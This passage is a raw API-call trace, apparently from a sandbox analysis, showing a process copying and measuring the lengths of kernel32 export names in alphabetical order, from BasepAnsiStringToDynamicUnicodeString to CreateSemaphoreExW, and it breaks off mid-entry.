[0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.132] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.132] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.132] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.132] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.132] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.132] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.132] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.132] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.133] lstrlenA (lpString="BEEP") returned 4 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.133] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.133] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.133] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.133] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.133] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.133] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.133] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.133] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.133] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.133] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.133] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.133] lstrlenA (lpString="CANCELIO") returned 8 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.133] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.133] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.133] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.133] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.133] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.133] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.133] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.134] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.134] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.134] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.134] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.134] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.134] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.134] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.134] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.134] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.134] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.134] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.134] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.134] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.134] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.134] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.134] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.134] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.134] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.134] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.134] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.135] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.135] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.135] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.135] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.135] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.135] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.135] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.135] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.135] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.135] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.135] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.135] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.135] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.135] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.135] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.135] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.135] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.135] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.135] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.136] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.136] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.136] lstrlenA (lpString="COPYFILEA") returned 9 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.136] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.136] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.136] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.136] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.136] lstrlenA (lpString="COPYFILEW") returned 9 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.136] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.136] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.136] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.136] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.136] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.136] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.136] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.136] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.136] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.136] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.136] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.136] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.137] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.137] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.137] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.137] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.137] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.137] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.137] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.137] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.137] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.137] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.137] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.137] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.137] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.137] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.137] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.137] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.137] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.137] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.137] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.138] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.138] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.138] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.138] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.138] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.138] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.138] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.138] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.138] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.138] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.138] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.138] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.138] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.138] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.139] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.139] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.139] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.139] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.139] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.139] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.139] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.139] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.139] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.139] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.139] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.139] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.139] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.139] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 